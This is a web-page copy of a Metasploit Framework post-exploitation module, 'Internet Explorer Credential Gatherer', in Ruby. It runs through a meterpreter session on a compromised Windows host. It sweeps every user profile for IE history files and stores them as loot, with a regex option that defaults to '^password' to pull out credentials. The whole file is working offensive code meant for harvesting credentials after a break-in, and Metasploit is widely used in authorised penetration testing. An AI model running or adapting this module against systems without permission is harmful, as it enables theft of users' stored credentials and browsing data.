Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/windows/gather/credentials/ie.rb
19591 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7
  include Msf::Post::File

8
  include Msf::Post::Windows::UserProfiles

9
  include Msf::Post::Windows::Packrat

10
  ARTIFACTS =

11
    {

12
      application: 'IE',

13
      app_category: 'browsers',

14
      gatherable_artifacts: [

15
        {

16
          filetypes: 'web_history',

17
          path: 'LocalSettings',

18
          dir: 'History',

19
          artifact_file_name: 'index.dat',

20
          description: 'IE history',

21
          credential_type: 'dat'

22
        }

23
      ]

24
    }.freeze

25


26
  def initialize(info = {})

27
    super(

28
      update_info(

29
        info,

30
        'Name' => 'Internet Explorer Credential Gatherer',

31
        'Description' => %q{

32
          This module searches for Internet Explorer credentials on a Windows host.

33
        },

34
        'License' => MSF_LICENSE,

35
        'Author' => [

36
          'Kazuyoshi Maruta',

37
          'Daniel Hallsworth',

38
          'Barwar Salim M',

39
          'Z. Cliffe Schreuders' # http://z.cliffe.schreuders.org

40
        ],

41
        'Platform' => ['win'],

42
        'SessionTypes' => ['meterpreter'],

43
        'Notes' => {

44
          'Stability' => [CRASH_SAFE],

45
          'Reliability' => [],

46
          'SideEffects' => []

47
        }

48
      )

49
    )

50


51
    register_options(

52
      [

53
        OptRegexp.new('REGEX', [false, 'Match a regular expression', '^password']),

54
        OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),

55
        OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),

56
        # enumerates the options based on the artifacts that are defined below

57
        OptEnum.new('ARTIFACTS', [

58
          false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map do |k|

59
                                                          k[:filetypes]

60
                                                        end.uniq.unshift('All')

61
        ])

62
      ]

63
    )

64
  end

65


66
  def run

67
    print_status('Filtering based on these selections:  ')

68
    print_status("ARTIFACTS: #{datastore['ARTIFACTS'].capitalize}")

69
    print_status("STORE_LOOT: #{datastore['STORE_LOOT']}")

70
    print_status("EXTRACT_DATA: #{datastore['EXTRACT_DATA']}\n")

71


72
    # used to grab files for each user on the remote host

73
    grab_user_profiles.each do |userprofile|

74
      run_packrat(userprofile, ARTIFACTS)

75
    end

76


77
    print_status 'PackRat credential sweep completed'

78
  end

79
end

80


81